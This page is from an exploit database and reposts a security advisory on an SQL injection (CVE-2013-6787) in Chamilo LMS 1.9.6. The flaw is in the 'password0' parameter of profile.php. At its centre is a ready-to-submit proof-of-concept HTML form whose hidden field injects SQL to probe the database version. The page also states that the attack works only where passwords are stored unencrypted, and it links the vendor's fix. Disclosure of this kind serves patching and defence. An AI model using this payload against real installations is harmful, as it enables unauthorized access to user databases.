[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Chamilo LMS 1.9.6 (profile.php, password0 param) - SQL Injection Vulnerability

Author
High-Tech Bridge
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-21612
Category
web applications
Date add
03-12-2013
CVE
CVE-2013-6787
Platform
php
High-Tech Bridge Security Research Lab discovered vulnerability in Chamilo LMS, which can be exploited to perform SQL Injection attacks.
 
 
1) SQL Injection in Chamilo LMS: CVE-2013-6787
 
The vulnerability exists due to insufficient validation of "password0" HTTP POST parameter passed to "/main/auth/profile.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.
 
The following exploitation example displays version of MySQL server:
 
<form action="http://[host]/main/auth/profile.php" method="post" name="main">
<input type="hidden" name="password0"  value="' OR substring(version(),1,1)=5 -- ">
<input type="hidden" name="password1"  value="password">
<input type="hidden" name="password2"  value="password">
<input type="hidden" name="apply_change"  value="">
<input type="hidden" name="firstname"  value="first_name">
<input type="hidden" name="lastname"  value="last_name">
<input type="hidden" name="username"  value="username">
<input type="hidden" name="official_code"  value="USER">
<input type="hidden" name="phone"  value="">
<input type="hidden" name="language"  value="">
<input type="hidden" name="extra_mail_notify_invitation"  value="">
<input type="hidden" name="extra_mail_notify_message"  value="">
<input type="hidden" name="extra_mail_notify_group_message"  value="">
<input type="hidden" name="_qf__profile"  value="">
<input type="hidden" name=""  value="">
<input type="submit" id="btn">
</form>
 
 
Successful exploitation of this vulnerability requires that the application is configured during installation not to encrypt users' passwords ("Encryption method" option is set to "none").
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Edit the source code and apply changes according to vendor's instructions:.
 
More Information:
https://support.chamilo.org/projects/chamilo-18/wiki/Security_issues#Issue-10-2013-11-06-Moderate-risk-SQL-Injection-in-specific-unrecommended-case
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23182 - https://www.htbridge.com/advisory/HTB23182 - SQL Injection in Chamilo LMS.
[2] Chamilo LMS - http://www.chamilo.org/ - Chamilo aims at bringing you the best e-learning and collaboration platform in the open source world.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

#  0day.today [2024-12-26]  #